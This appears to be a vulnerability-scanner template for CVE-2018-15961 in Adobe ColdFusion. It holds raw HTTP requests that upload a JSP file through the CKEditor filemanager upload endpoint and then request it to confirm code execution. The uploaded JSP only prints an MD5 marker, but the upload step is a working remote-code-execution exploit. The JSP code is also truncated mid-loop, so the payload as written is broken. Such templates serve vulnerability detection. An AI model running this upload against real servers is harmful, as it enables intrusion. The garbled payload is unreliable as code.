id: CVE-2018-15961

info:
  name: Adobe ColdFusion Unrestricted File Upload RCE
  author: SkyLark-Lab,ImNightmaree
  severity: critical
  description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-15961
    - https://github.com/xbufu/CVE-2018-15961
  tags: cve,cve2018,adobe,rce,coldfusion,fileupload
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2018-15961
    cwe-id: CWE-434

requests:
  - raw:
      - |
        POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------24464570528145

        -----------------------------24464570528145
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
        Content-Type: image/jpeg

        <%@ page import="java.util.*,java.io.*"%>
        <%@ page import="java.security.MessageDigest"%>
        <%
        String cve = "CVE-2018-15961";
        MessageDigest alg = MessageDigest.getInstance("MD5");
        alg.reset();
        alg.update(cve.getBytes());
        byte[] digest = alg.digest();
        StringBuffer hashedpasswd = new StringBuffer();
        String hx;
        for (int i=0;i
        -----------------------------24464570528145
        Content-Disposition: form-data; name="path"

        {{randstr}}.jsp
        -----------------------------24464570528145--

      - |
        GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961

      - type: status
        status:
          - 200